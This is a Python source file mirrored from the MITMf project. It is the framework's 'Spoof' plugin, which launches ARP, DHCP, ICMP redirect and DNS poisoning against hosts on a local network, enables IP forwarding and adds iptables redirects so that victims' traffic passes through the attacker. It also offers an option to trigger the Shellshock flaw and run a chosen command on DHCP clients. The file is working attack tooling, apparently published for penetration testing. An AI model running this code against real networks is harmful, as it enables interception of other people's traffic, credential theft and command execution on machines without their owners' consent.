mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-03-12 04:35:49 -07:00
111 lines
4.7 KiB
Python
111 lines
4.7 KiB
Python
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
from plugins.plugin import Plugin
|
|
|
|
class Spoof(Plugin):
|
|
name = "Spoof"
|
|
optname = "spoof"
|
|
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
|
version = "0.6"
|
|
|
|
def initialize(self, options):
|
|
'''Called if plugin is enabled, passed the options namespace'''
|
|
self.options = options
|
|
self.protocol_instances = []
|
|
|
|
from core.utils import iptables, shutdown, set_ip_forwarding
|
|
#Makes scapy more verbose
|
|
debug = False
|
|
|
|
if options.arp:
|
|
if not options.gateway:
|
|
shutdown("[Spoof] --arp argument requires --gateway")
|
|
|
|
from core.poisoners.ARP import ARPpoisoner
|
|
arp = ARPpoisoner(options)
|
|
arp.debug = debug
|
|
self.tree_info.append('ARP spoofing enabled')
|
|
self.protocol_instances.append(arp)
|
|
|
|
elif options.dhcp:
|
|
from core.poisoners.DHCP import DHCPpoisoner
|
|
|
|
if options.targets:
|
|
shutdown("[Spoof] --targets argument invalid when DCHP spoofing")
|
|
|
|
dhcp = DHCPpoisoner(options)
|
|
dhcp.debug = debug
|
|
self.tree_info.append('DHCP spoofing enabled')
|
|
self.protocol_instances.append(dhcp)
|
|
|
|
elif options.icmp:
|
|
from core.poisoners.ICMP import ICMPpoisoner
|
|
|
|
if not options.gateway:
|
|
shutdown("[Spoof] --icmp argument requires --gateway")
|
|
|
|
if not options.targets:
|
|
shutdown("[Spoof] --icmp argument requires --targets")
|
|
|
|
icmp = ICMPpoisoner(options)
|
|
icmp.debug = debug
|
|
self.tree_info.append('ICMP spoofing enabled')
|
|
self.protocol_instances.append(icmp)
|
|
|
|
if options.dns:
|
|
self.tree_info.append('DNS spoofing enabled')
|
|
if iptables().dns is False and options.filter is None:
|
|
iptables().DNS(self.config['MITMf']['DNS']['port'])
|
|
|
|
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
|
shutdown("[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
|
|
|
set_ip_forwarding(1)
|
|
|
|
if iptables().http is False and options.filter is None:
|
|
iptables().HTTP(options.listen_port)
|
|
|
|
for protocol in self.protocol_instances:
|
|
protocol.start()
|
|
|
|
def options(self, options):
|
|
group = options.add_mutually_exclusive_group(required=False)
|
|
group.add_argument('--arp', dest='arp', action='store_true', help='Redirect traffic using ARP spoofing')
|
|
group.add_argument('--icmp', dest='icmp', action='store_true', help='Redirect traffic using ICMP redirects')
|
|
group.add_argument('--dhcp', dest='dhcp', action='store_true', help='Redirect traffic using DHCP offers')
|
|
options.add_argument('--dns', dest='dns', action='store_true', help='Proxy/Modify DNS queries')
|
|
options.add_argument('--netmask', dest='netmask', type=str, default='255.255.255.0', help='The netmask of the network')
|
|
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
|
options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
|
|
options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
|
|
options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
|
|
options.add_argument('--arpmode', type=str, dest='arpmode', default='rep', choices=["rep", "req"], help='ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
|
|
|
def on_shutdown(self):
|
|
from core.utils import iptables, set_ip_forwarding
|
|
|
|
for protocol in self.protocol_instances:
|
|
if hasattr(protocol, 'stop'):
|
|
protocol.stop()
|
|
|
|
iptables().flush()
|
|
|
|
set_ip_forwarding(0)
|